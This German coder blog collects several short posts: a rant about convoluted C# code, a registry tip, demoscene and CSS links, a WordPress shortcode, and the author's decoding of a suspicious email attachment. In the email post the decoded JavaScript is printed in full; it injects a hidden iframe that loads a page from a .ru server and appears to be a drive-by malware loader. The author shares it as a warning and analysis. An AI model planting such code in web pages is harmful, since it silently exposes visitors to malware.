Kleine Plauderei aus dem beruflichen Nähkästchen eines leicht gefrusteten Coders. Normale Menschen klicken bitte weiter, hier gibt es nichts zu sehen.

In meiner Tätigkeit als Codemonkey kommen mir ja immer wieder befremdliche Dinge unter, die irgendwelche anderen Codeäffchen zusammengetippselt haben. Und manchmal reicht ein einzelner Facepalm nicht mehr aus, da der fail einfach zu epic ist. So auch heute, als ich über folgendes Lehrbuchbeispiel für Security by Obscurity gestoßen bin:

Aufgabenstellung: Der Anwender soll ein paar Daten in eine Tabelle klopfen, aus diesen Daten werden dann über einen Template-Mechanismus XML-Dateien erzeugt. Echt kein Hexenwerk. So sieht das aus:

Nun müssen also die eingebenen Daten irgendwie weiter gereicht werden, um von einer anderen Klasse verarbeitet zu werden.

Der Typ, der hier am Werk war, hat sich jetzt Dictionaries zusammengebaut, mit dem Attributnamen als Key. Soweit gehe ich d'accord. Anstatt nun aber ganz simpel die Werte als Strings abzulegen, hat der Typ Windows.System.Form.Textboxes genommen!! WTF? Und nicht genug damit! Nein, nein. Erst sammelt er sich nämlich die "Invarianten" und die "Varianten" Daten in 2 unterschiedlichen Dictionaries, nur um die dann mitten im Aufruf der verarbeitenden Methode zu einem einzigen Dictionary zusammen zu mergen. Das gibt dann sowas:

count = KLASSE.Do(actionName,
new Dictionary().Union(variantDataGridLinkedBox).ToDictionary(pair => pair.Key, pair => pair.Value).Union(invariantDataGridLinkedBox).ToDictionary(pair => pair.Key, pair => pair.Value));


Hö hö... höhöhö.... mwahahhaa... WAAAHAHAAAAA

Geht's bitte noch umständlicher? Klar! Er initialisiert sich nämlich diese Dictionaries vorher auch noch super hirnverbrannt mit diversen Loops, in denen er dann erstmal leere Textboxen erzeugt(!) um nachher was zu haben, wo er seine Daten dann reinschreiben kann! AUA!!!

Ich also alles rausgeworfen inklusive Initialisierungsfunktionen. Die Daten werden jetzt just-in-time eingesammelt, in ein einfaches Dictionary aus Strings gesteckt und der gleiche Aufruf sieht nachher so aus:

count = KLASSE.Do(actionName,dataToWrite);

ja, zugegeben, das sieht nicht so sophisticated aus. Aber ich kann danach wenigstens wieder ohne Knoten im Hirn ins Bett gehen.

Wollte ich einfach mal wieder im Blog haben:

Meine ersten Gehvesuche in DirectX unter C#
Musik: "Trick Bag" von Dafunk, mit freundlicher Genehmigung.

Jetzt geht's ab! Ich habe gerade eine super obskure Mail erhalten, die als Attachment eine HTML-Seite mit ganz derbe enrcyptetem Javascript-Code enthielt.

Coderfreaks da draußen: hat eine/r von euch Zeit, Muße und ausreichend Expertise um mir zu verraten, was dieser Code macht?

Die komplette Mail gibt es hier als ZIP-File, der interessante JS-Code sieht so aus:

2. Update: Hier war nun der Code abgedruckt. Allerdings blocken manche Virenscanncer (z.B. AVAST) dann komplett den Zugriff auf mein Blog, deshalb musste ich den Code leider entfernen...

Disclaimer: ich hafte weder für Schäden noch für sonstige Unbill, die durch unsachgemäße Handhabung mit der Mail und/oder oben stehendem Code entstehen könnten. Der Code ist NICHT von mir, ich bin selbst nur ein potentielles Opfer. Noobs und Computerunversteher seien hiermit ausdrücklich gewarnt, mit dem Code herum zu experimentieren oder auf oben stehenden Link zu klicken.

1. Update: Hab selber Muße. Also. Der Code ist natürlich nicht wirklich encrypted sondern irgendwie bitgeshiftet oder was weiß denn ich wie das heißt. Lesbar wird daraus:

if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://gorysevera.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }

und ich will gar nicht wissen, was uns auf http://gorysevera.ru:8080/forum/showthread.php erwartet...

Ich schlage mich auf Arbeit gerade mit einer ziemlich fehlerhaften Installation eines extrem umfangreichen Programms herum. Dabei ging die Installation eines Windows-Services schief. Der versucht jetzt, eine EXE von einem Ort zu starten, die es dort gar nicht gibt. Ich würde also gerne den Pfad zu dieser EXE umbiegen.

Ganz einfach. In der Registry unter

den ImagePath anpassen.

(gefunden bei chitgoks)

Coder/Nerds/Geeks aufgepasst! In Köln findet vom 10.8. - 12.8. die legendäre Evoke statt. Und da die dazugehörige Einladung nicht als YouTube-Vid am Start ist, gibt es jetzt eben die von 2010, die ihr bitte in HD genießt.

http://www.evoke.eu/2012/

Und ich bin nicht da, grmbl

Wer mal einen tieferen Einblick in die Programmierung eines 3D-Shooters bekommen will, kann sich dieses Codereview des Doom3-Source-Codes reinziehen.

Ich weiß nicht, ob ihr wisst, was eine Computerdemo ist. Das kann ich auch nur schwer erklären und die deutsche Wikipedia hat leider nichts Griffiges dazu parat. Audiovisuelle Echtzeit-Computerkunst trifft's wohl am Ehesten. Schaut euch mal das Video im Vollbild (!) an und versucht euch dabei zu vergegenwärtigen, dass ihr

a.) nur Buchstaben seht und
b.) alles was ihr seht in eben diesem Moment berechnet wird.

Damit habt ihr schon zwei wichtige Element von Demos kennengelernt nämlich, dass

a.) mit beschränkten Mitteln Dinge getan werden, die über die gesteckten Grenzen (scheinbar) hinausgehen und
b.) alles in Echtzeit berechnet wird

Eigentlich sind Erklärungen auch völlig unnötig. Genießt einfach die Show und wenn ihr Gefallen daran findet, schaut euch ruhig noch ein paar related Videos an. Für Kenner sag' ich jetzt noch Plasma, 3D-Engine, Dithering, Fraczoom und ASCII-Schnee. Yay

http://aa-project.sourceforge.net/

Three goals of AA-Project:

Port all important software (like Doom, Second Reality, X windows etc..) on AA-lib.
Port AA-lib on all available platforms (mainly ZX-Spectrum and Sharp).
Force IBM to start manufacturing MDA cards again.

ASCII-Art | demoscene

Wenn ich sowas sehe frage ich mich ja immer wieder, ob ich mit meiner Einstellung so grundsätzlich verkehrt liege? Ich halte nämlich genau gar nix von solch endlos verschachtelten if-else-Konstrukten. Ich denke mir immer, das hätte man auch eleganter hinkriegen können, wenn man gewollt hätte. Warum muss ausgerechnet ich immer wieder darauf angesetzt werden, so eine Scheiße auch noch zu erweitern??

Ooooh Leute, jetzt bin ich mal happy. Aber so richtig. Unzählige Male schon habe ich mir an dieser Zeichenkette die Finger verrenkt:

<small>(via <a href="http://lass.dir.was.einfall.en/" target="_blank">tollewebsite</a>)</small>

und das alles nur, weil ich Quellenangaben für eine essentielle Zutat der Bloggerei halte. Zwar dünkt mir, ich hätte mal ein Plugin bei WordPress gesehen, das das via-Setzen vereinfacht, eine Suche nach "via plugin" ist leider ziemlich aussichtslos. Aber mit dieser Tippselei ist jetzt ein für alle mal Schluss Ich habe mir nämlich einen WordPress-Shortcode gebastelt und muss ab sofort nur noch sowas hier tippen:

[via tollewebsite lass.dir.was.einfall.en]

was auf magische Art und Weise zu dem hier wird:

Ich dachte mir, ich erzähl euch mal wie das geht.

(mehr …)

Liebe Normalbürger. Wollt ihr mal wissen, was Typen wie ich im Büro so treiben? Bei CodeAcademy könnt ihr es selbst mal ausprobieren.

(via superlevel)

Höhö:

Wäre allerdings noch lustiger, wenn es nicht die Software wäre, an der ich gerade rumcode...

Also wenn mir das nächste Mal langweilig ist, werde ich mein Blog noch etwas schräger machen als es eh schon ist. Mit CSS kann man ja heutzutage so geile Sachen hinfrickeln:

http://www.useragentman.com/tests/cssSandpaper/cube3.html

Das hier ist reinster Coderporn, Nicht-Geeks werden wohl nicht kapieren um was es geht. Ich kann das jetzt auch nicht auf die Schnelle erklären, ich sag nur WHOA! Ein 224-Byte-Tunnel-Effect, gecodet in Photoshop!!1!

(via chipflip, superlevel)